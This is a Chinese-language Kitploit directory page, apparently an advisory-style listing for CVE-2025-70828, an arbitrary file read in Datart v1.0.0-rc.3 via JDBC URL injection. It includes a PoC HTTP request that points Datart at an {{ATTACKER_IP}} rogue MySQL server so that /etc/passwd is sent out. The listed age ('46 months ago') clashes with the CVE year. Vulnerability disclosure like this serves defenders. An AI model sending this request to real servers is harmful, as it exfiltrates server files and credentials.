Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-70828 — Datart v1.0.0-rc.3 JDBC 连接字符串注入导致任意文件读取 | Kitploit
工具/GitHubGitHub/xiaoxiaoranxxx/cve-2025-70828
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubxiaoxiaoranxxx/cve-2025-70828

CVE-2025-70828

Datart v1.0.0-rc.3 JDBC 连接字符串注入导致任意文件读取

查看仓库
46个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-70828

摘要

在 Datart v1.0.0-rc.3 中发现了一个任意文件读取漏洞。该应用程序在数据源配置期间未能正确验证 JDBC 连接 URL。

漏洞详情

漏洞类型: 不当输入验证(CWE-20)/ 任意文件读取 受影响版本: Datart v1.0.0-rc.3 严重程度: 高危(可能导致敏感信息泄露)

描述

该漏洞存在于数据源配置模块中。应用程序未严格清理 JDBC 配置中的 url 参数。具有数据源配置权限的远程攻击者可以向 JDBC URL 注入恶意参数(特别是 allowLoadLocalInfile=true)。

通过将 JDBC 连接指向攻击者控制的恶意 MySQL 服务器(Rogue MySQL Server),攻击者可以触发客户端将 Datart 服务器上的本地文件发送到攻击者的服务器。

影响

成功利用该漏洞可使已认证攻击者读取服务器文件系统中的任意文件(例如 /etc/passwd、配置文件、源代码),可能导致服务器被攻陷或遭受进一步攻击。

概念验证(PoC)

  1. 设置:攻击者搭建一个能够利用 LOAD DATA LOCAL INFILE 功能的恶意 MySQL 服务器(例如使用 等工具)。
rogue_mysql_server
  • 利用:攻击者向 Datart 服务器发送以下请求以测试连接:
  • root@kitploit:~
    POST /api/v1/data-provider/test HTTP/1.1
    Host: {{TARGET_HOST}}
    Content-Type: application/json
    Authorization: Bearer {{VALID_JWT_TOKEN}}
    Accept: application/json
    
    {
      "name": "cve-poc-test",
      "type": "JDBC",
      "properties": {
        "dbType": "MYSQL",
        "url": "jdbc:mysql://{{ATTACKER_IP}}:{{ATTACKER_PORT}}/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360",
        "user": "fileread_/etc/passwd",
        "password": "any_password",
        "driverClass": "com.mysql.cj.jdbc.Driver",
        "serverAggregate": false,
        "enableSpecialSQL": false,
        "enableSyncSchemas": true,
        "syncInterval": "60",
        "properties": {}
      }
    }
    
    下载工具